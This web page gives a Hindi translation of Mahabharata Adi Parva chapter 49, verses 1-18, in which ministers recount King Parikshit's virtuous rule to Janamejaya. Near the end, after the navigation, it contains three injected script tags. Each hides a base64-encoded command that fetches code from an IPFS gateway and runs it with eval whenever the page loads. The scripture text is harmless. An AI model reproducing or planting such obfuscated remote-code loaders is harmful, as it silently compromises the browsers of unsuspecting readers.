महाभारत आदि पर्व अध्याय 49 श्लोक 1-18

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

एकोनपञ्चाशत्तम (49) अध्‍याय: आदि पर्व (आस्तीक पर्व)

महाभारत: आदि पर्व: एकोनपञ्चाशत्तम अध्‍याय: श्लोक 1-18 का हिन्दी अनुवाद

शौनकजी बोले—सूतनन्दन ! राजा जनमेजय ने (उत्तक की बात सुनकर) अपने पिता परीक्षित के स्वर्गवास के सम्बन्ध में मन्त्रियों से जो पूछताछ की थी, उसका आप विस्तारपूर्वक पुनः वर्णन कीजिये। उग्रश्रवाजी ने कहा—ब्रह्मन ! मुनि ये, उस समय राजा ने मन्त्रियों से जो कुछ पूछा और उन्होंने परीक्षित की मृत्यु के सम्बन्ध में जैसी बातें बतायी, वह सब मैं सुना रहा हूँ। जनमेजय ने पूछा—आप लोग यह जानते होंगे कि मेरे पिता के जीवनकाल में उनका आचार-व्यवहार कैसा था? और अन्तकाल आने पर वे महायशस्वी नरेश किस प्रकार मृत्यु को प्राप्त हुए थे? आप लोगों से अपने पिता के सम्बन्ध में सारा वृत्तान्त सुनकर ही मुझे शान्ति प्राप्त होगी; अन्यथा मैं कभी शान्त न रह सकूँगा। उग्रश्रवाजी कहते हैं—राजा के सब मन्त्री धर्मज्ञ और बुद्धिमान थे। उन महात्मा राजा जनमेजय के इस प्रकार पूछने पर वे सभी उनसे यों बोले। मन्त्रियों ने कहा—भूपाल ! तुम जो कुछ पूछते हो, वह सुनो ! तुम्हारे महात्मा पिता राज- राजेश्वर परीक्षित का चरित्र जैसा था और जिस प्रकार वे मृत्यु को प्राप्त हुए वह सब हम बता रहे हैं। महाराज ! आपके पिता बड़े धर्मात्मा, महात्मा और प्रजापालक थे। वे महामना नरेश इस जगत् में जैसे आचार- व्यवहार का पालन करते थे, वह सुनो। वे चारों वर्णों को अपने-अपने धर्म में स्थापित करके उन सबकी धर्मपूर्वक रक्षा करते थे। राजा परीक्षित केवल धर्म के ज्ञाता ही नहीं थे, वे धर्म के साक्षात स्वरूप थे। उनके पराक्रम की कहीं तुलना नहीं थी। वे श्री सम्पन्न होकर इस वसुधादेवी का पालन करते थे। जगत् में उनसे द्वेष रखने वाले कोई न थे और वे भी किसी से द्वेष नहीं रखते थे। प्रजापति ब्रह्माजी के समान वे समस्त प्राणियों के प्रति समभाव रखते थे। राजन ! महाराज परीक्षित के शासन में रहकर ब्राह्मण, क्षत्रिय, वैश्य तथा शूद्र सभी अपने-अपने वर्णाश्रमोचित कर्मों में संलग्न और प्रसन्नचित्त रहते थे। वे महाराज विधवाओं, अनाथों, अंगहीनों और दीनों का भी भरण-पोषण करते थे। दूसरे चन्द्रमा की भाँति उनका दर्शन सम्पूर्ण प्राणियों के लिये सुखद एवं सुलभ था। उनके राज्य में सब लोग हृष्ट- पुष्ट थे। वे लक्ष्मीवान, सत्यवादी तथा अटल पराक्रमी थे। राजा परीक्षित धर्नुवेद में कृपाचार्य के शिष्य थे। जनमेजय ! तुम्हारे पिता भगवान श्रीकृष्ण के भी प्रिय थे। वे महायशस्वी महाराज सम्पूर्ण जगत् के प्रेमपात्र थे। जब कुरूकुल परिक्षीण (सर्वथा नष्ट) हो चला था, उस समय उत्तरा के गर्भ से उनका जन्म हुआ। इसलिये वे महाबली अभिमन्युकुमार परीक्षित नाम से विख्यात हुए। राजधर्म और अर्थनीति में वे अत्यन्त निपुण थे। समस्त सद्रुणों ने स्वयं उनका वरण किया था। वे सदा उनसे संयुक्त रहते थे। उन्होंने अपनी इन्द्रियों को जीतकर मन को अपने वश में कर रखा था। वे मेधावी तथा धर्म का सेवन करने वाले थे। उन्होंने काम, क्रोध, लोभ, मद और मात्सर्य—इन छहों शत्रुओं पर विजय प्राप्त कर ली थी। उनकी बुद्धि विशाल थी। वे नीति के विद्वानों में सर्वश्रेष्ठ थे। तुम्हारे पिता ने साठ वर्ष की आयु तक इन समस्‍त प्रजाजनों का पालन किया था। तदनन्तर हम सबको दुःख देकर उन्होंने विदेह-कैवल्य प्राप्त किया। पुरुषश्रेष्ठ ! पिता के देहावसान के बाद तुमने धर्मपूर्वक इस राज्य को ग्रहण किया है, बाल्यावस्था में ही तुम्हारा राज्याभिषेक हुआ था। तब से तुम्हीं इस राज्य के समस्त प्राणियों का पालन करते हो।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>